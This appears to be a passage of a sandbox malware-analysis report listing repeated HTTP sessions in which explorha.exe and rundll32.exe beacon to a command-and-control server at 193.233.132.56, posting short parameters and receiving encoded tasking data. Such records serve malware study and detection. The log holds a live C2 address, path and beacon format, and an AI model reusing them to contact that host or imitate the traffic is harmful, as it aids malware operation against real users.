                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:08.702778101 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.449744193.233.132.56806704C:\Windows\SysWOW64\rundll32.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:08.422561884 CEST159OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 5
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 77 6c 74 3d 31
                                                                                                    Data Ascii: wlt=1
                                                                                                    Apr 19, 2024 04:26:08.674129009 CEST719INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 61 30 31 39 39 36 36 34 31 64 61 32 63 61 66 38 66 32 30 61 30 39 62 65 64 64 31 65 32 38 61 62 64 30 31 66 62 61 35 35 64 66 32 33 63 61 61 61 62 33 62 62 37 62 65 65 61 39 66 62 62 35 31 61 36 38 62 64 65 35 36 61 36 30 37 31 38 62 37 33 63 34 30 64 2d 31 2d 5f 32 5f 66 32 30 32 39 66 32 63 32 62 66 64 38 34 63 62 61 30 35 30 35 61 66 35 39 62 30 63 37 63 39 61 38 36 34 36 65 66 31 33 38 66 32 65 62 61 66 34 66 66 62 31 37 62 64 66 61 66 61 66 65 32 36 65 33 39 65 66 62 36 33 31 32 37 32 34 66 64 37 66 63 33 37 65 2d 32 2d 5f 33 5f 38 65 31 65 66 65 36 36 31 65 39 39 63 32 62 38 61 62 30 39 33 62 66 37 66 37 32 33 30 37 38 62 63 30 34 61 62 34 34 35 64 61 32 63 38 61 66 39 61 63 66 61 30 62 64 38 66 35 66 30 62 61 31 62 34 35 66 38 2d 33 2d 5f 34 5f 38 36 33 38 63 64 36 66 30 38 61 38 64 39 62 64 62 30 30 66 30 32 38 38 66 63 30 66 31 63 39 38 66 66 37 35 62 39 36 61 62 63 36 63 61 35 66 39 62 61 65 32 32 63 64 37 65 34 64 34 39 35 34 62 36 33 65 38 2d 34 2d 5f 35 5f 66 36 34 38 64 64 37 37 33 34 38 33 38 35 65 31 62 66 30 30 35 65 61 64 65 39 33 65 30 37 65 38 64 62 35 66 39 38 34 61 62 63 32 61 62 62 39 65 38 62 66 65 30 36 66 31 64 61 63 33 65 30 35 30 33 39 63 35 66 32 34 37 34 61 37 66 66 32 36 36 61 30 37 30 64 37 38 63 34 61 62 66 63 61 61 62 64 63 30 66 62 30 66 65 65 30 33 39 39 33 33 39 61 36 65 32 35 61 34 61 31 63 34 32 31 36 63 39 65 35 33 37 31 63 39 32 61 32 38 66 36 35 30 35 38 38 31 37 32 66 35 62 35 30 36 62 39 37 36 33 39 64 65 32 38 31 30 65 31 66 35 36 37 31 38 35 32 35 63 31 62 66 65 39 65 38 39 39 30 66 2d 35 2d 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 210 +++_1_a01996641da2caf8f20a09bedd1e28abd01fba55df23caaab3bb7beea9fbb51a68bde56a60718b73c40d-1-_2_f2029f2c2bfd84cba0505af59b0c7c9a8646ef138f2ebaf4ffb17bdfafafe26e39efb6312724fd7fc37e-2-_3_8e1efe661e99c2b8ab093bf7f723078bc04ab445da2c8af9acfa0bd8f5f0ba1b45f8-3-_4_8638cd6f08a8d9bdb00f0288fc0f1c98ff75b96abc6ca5f9bae22cd7e4d4954b63e8-4-_5_f648dd77348385e1bf005eade93e07e8db5f984abc2abb9e8bfe06f1dac3e05039c5f2474a7ff266a070d78c4abfcaabdc0fb0fee0399339a6e25a4a1c4216c9e5371c92a28f650588172f5b506b97639de2810e1f56718525c1bfe9e8990f-5-0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.449745193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:09.061721087 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:09.306716919 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:09.307878971 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:09.558798075 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.449746193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:09.927654982 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:10.177648067 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:10.178817034 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:10.432334900 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.449747193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:10.793979883 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:11.043517113 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:11.044610023 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:11.298471928 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.449748193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:11.656847954 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:11.902546883 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:11.903152943 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:12.152231932 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.449749193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:12.498990059 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:12.742294073 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:12.745601892 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:12.991785049 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.449750193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:13.350413084 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:13.601557970 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:13.605001926 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:13.859632015 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.449751193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:14.242257118 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:14.480489969 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:14.481188059 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:14.725044966 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.449752193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:15.083931923 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:15.333383083 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:15.334216118 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:15.588922024 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.449753193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:15.952924967 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:16.198456049 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:16.199172020 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
